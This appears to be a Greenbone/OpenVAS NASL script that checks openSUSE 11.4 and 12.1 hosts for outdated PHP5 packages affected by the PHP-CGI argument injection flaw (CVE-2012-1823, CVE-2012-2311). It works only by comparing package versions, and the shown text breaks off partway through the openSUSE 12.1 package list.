GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850218\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-12-13 17:02:10 +0530 (Thu, 13 Dec 2012)\");\n script_cve_id(\"CVE-2012-1823\", \"CVE-2012-2311\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"openSUSE-SU\", value:\"2012:0590-1\");\n script_name(\"openSUSE: Security Advisory for update (openSUSE-SU-2012:0590-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'update'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(openSUSE11\\.4|openSUSE12\\.1)\");\n\n script_tag(name:\"affected\", value:\"update on openSUSE 12.1, openSUSE 11.4\");\n\n script_tag(name:\"insight\", value:\"when used in CGI mode remote attackers could inject command\n line arguments to php\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE11.4\") {\n if(!isnull(res = isrpmvuln(pkg:\"apache2-mod_php5\", rpm:\"apache2-mod_php5~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"apache2-mod_php5-debuginfo\", rpm:\"apache2-mod_php5-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5\", rpm:\"php5~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-bcmath\", rpm:\"php5-bcmath~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-bcmath-debuginfo\", rpm:\"php5-bcmath-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-bz2\", rpm:\"php5-bz2~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-bz2-debuginfo\", rpm:\"php5-bz2-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-calendar\", rpm:\"php5-calendar~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-calendar-debuginfo\", rpm:\"php5-calendar-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ctype\", rpm:\"php5-ctype~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ctype-debuginfo\", rpm:\"php5-ctype-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-curl\", rpm:\"php5-curl~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-curl-debuginfo\", rpm:\"php5-curl-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-dba\", rpm:\"php5-dba~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-dba-debuginfo\", rpm:\"php5-dba-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-debuginfo\", rpm:\"php5-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-debugsource\", rpm:\"php5-debugsource~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-devel\", rpm:\"php5-devel~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-dom\", rpm:\"php5-dom~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-dom-debuginfo\", rpm:\"php5-dom-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-enchant\", rpm:\"php5-enchant~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-enchant-debuginfo\", rpm:\"php5-enchant-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-exif\", rpm:\"php5-exif~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-exif-debuginfo\", rpm:\"php5-exif-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fastcgi\", rpm:\"php5-fastcgi~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fastcgi-debuginfo\", rpm:\"php5-fastcgi-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fileinfo\", rpm:\"php5-fileinfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fileinfo-debuginfo\", rpm:\"php5-fileinfo-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fpm\", rpm:\"php5-fpm~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fpm-debuginfo\", rpm:\"php5-fpm-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ftp\", rpm:\"php5-ftp~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ftp-debuginfo\", rpm:\"php5-ftp-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gd\", rpm:\"php5-gd~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gd-debuginfo\", rpm:\"php5-gd-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gettext\", rpm:\"php5-gettext~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gettext-debuginfo\", rpm:\"php5-gettext-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gmp\", rpm:\"php5-gmp~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gmp-debuginfo\", rpm:\"php5-gmp-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-hash\", rpm:\"php5-hash~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-hash-debuginfo\", rpm:\"php5-hash-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-iconv\", rpm:\"php5-iconv~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-iconv-debuginfo\", rpm:\"php5-iconv-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-imap\", rpm:\"php5-imap~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-imap-debuginfo\", rpm:\"php5-imap-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-intl\", rpm:\"php5-intl~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-intl-debuginfo\", rpm:\"php5-intl-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-json\", rpm:\"php5-json~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-json-debuginfo\", rpm:\"php5-json-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ldap\", rpm:\"php5-ldap~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ldap-debuginfo\", rpm:\"php5-ldap-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mbstring\", rpm:\"php5-mbstring~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mbstring-debuginfo\", rpm:\"php5-mbstring-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mcrypt\", rpm:\"php5-mcrypt~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mcrypt-debuginfo\", rpm:\"php5-mcrypt-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mysql\", rpm:\"php5-mysql~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mysql-debuginfo\", rpm:\"php5-mysql-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-odbc\", rpm:\"php5-odbc~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-odbc-debuginfo\", rpm:\"php5-odbc-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-openssl\", rpm:\"php5-openssl~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-openssl-debuginfo\", rpm:\"php5-openssl-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pcntl\", rpm:\"php5-pcntl~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pcntl-debuginfo\", rpm:\"php5-pcntl-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pdo\", rpm:\"php5-pdo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pdo-debuginfo\", rpm:\"php5-pdo-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pgsql\", rpm:\"php5-pgsql~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pgsql-debuginfo\", rpm:\"php5-pgsql-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-phar\", rpm:\"php5-phar~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-phar-debuginfo\", rpm:\"php5-phar-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-posix\", rpm:\"php5-posix~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-posix-debuginfo\", rpm:\"php5-posix-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pspell\", rpm:\"php5-pspell~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pspell-debuginfo\", rpm:\"php5-pspell-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-readline\", rpm:\"php5-readline~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-readline-debuginfo\", rpm:\"php5-readline-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-shmop\", rpm:\"php5-shmop~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-shmop-debuginfo\", rpm:\"php5-shmop-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-snmp\", rpm:\"php5-snmp~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-snmp-debuginfo\", rpm:\"php5-snmp-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-soap\", rpm:\"php5-soap~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-soap-debuginfo\", rpm:\"php5-soap-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sockets\", rpm:\"php5-sockets~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sockets-debuginfo\", rpm:\"php5-sockets-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sqlite\", rpm:\"php5-sqlite~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sqlite-debuginfo\", rpm:\"php5-sqlite-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-suhosin\", rpm:\"php5-suhosin~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-suhosin-debuginfo\", rpm:\"php5-suhosin-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvmsg\", rpm:\"php5-sysvmsg~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvmsg-debuginfo\", rpm:\"php5-sysvmsg-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvsem\", rpm:\"php5-sysvsem~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvsem-debuginfo\", rpm:\"php5-sysvsem-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvshm\", rpm:\"php5-sysvshm~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvshm-debuginfo\", rpm:\"php5-sysvshm-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-tidy\", rpm:\"php5-tidy~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-tidy-debuginfo\", rpm:\"php5-tidy-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-tokenizer\", rpm:\"php5-tokenizer~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-tokenizer-debuginfo\", rpm:\"php5-tokenizer-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-wddx\", rpm:\"php5-wddx~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-wddx-debuginfo\", rpm:\"php5-wddx-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlreader\", rpm:\"php5-xmlreader~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlreader-debuginfo\", rpm:\"php5-xmlreader-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlrpc\", rpm:\"php5-xmlrpc~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlrpc-debuginfo\", rpm:\"php5-xmlrpc-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlwriter\", rpm:\"php5-xmlwriter~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlwriter-debuginfo\", rpm:\"php5-xmlwriter-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xsl\", rpm:\"php5-xsl~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xsl-debuginfo\", rpm:\"php5-xsl-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-zip\", rpm:\"php5-zip~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-zip-debuginfo\", rpm:\"php5-zip-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-zlib\", rpm:\"php5-zlib~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-zlib-debuginfo\", rpm:\"php5-zlib-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pear\", rpm:\"php5-pear~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"openSUSE12.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"apache2-mod_php5\", rpm:\"apache2-mod_php5~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"apache2-mod_php5-debuginfo\", rpm:\"apache2-mod_php5-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5\", rpm:\"php5~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-bcmath\", rpm:\"php5-bcmath~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-bcmath-debuginfo\", rpm:\"php5-bcmath-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-bz2\", rpm:\"php5-bz2~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-bz2-debuginfo\", rpm:\"php5-bz2-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-calendar\", rpm:\"php5-calendar~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-calendar-debuginfo\", rpm:\"php5-calendar-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ctype\", rpm:\"php5-ctype~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ctype-debuginfo\", rpm:\"php5-ctype-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-curl\", rpm:\"php5-curl~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-curl-debuginfo\", rpm:\"php5-curl-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-dba\", rpm:\"php5-dba~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-dba-debuginfo\", rpm:\"php5-dba-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-debuginfo\", rpm:\"php5-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-debugsource\", rpm:\"php5-debugsource~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-devel\", rpm:\"php5-devel~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-dom\", rpm:\"php5-dom~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-dom-debuginfo\", rpm:\"php5-dom-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-enchant\", rpm:\"php5-enchant~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-enchant-debuginfo\", rpm:\"php5-enchant-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-exif\", rpm:\"php5-exif~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-exif-debuginfo\", rpm:\"php5-exif-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fastcgi\", rpm:\"php5-fastcgi~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fastcgi-debuginfo\", rpm:\"php5-fastcgi-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fileinfo\", rpm:\"php5-fileinfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fileinfo-debuginfo\", rpm:\"php5-fileinfo-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fpm\", rpm:\"php5-fpm~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fpm-debuginfo\", rpm:\"php5-fpm-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ftp\", rpm:\"php5-ftp~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ftp-debuginfo\", rpm:\"php5-ftp-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gd\", rpm:\"php5-gd~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gd-debuginfo\", rpm:\"php5-gd-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gettext\", rpm:\"php5-gettext~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gettext-debuginfo\", rpm:\"php5-gettext-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gmp\", rpm:\"php5-gmp~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += 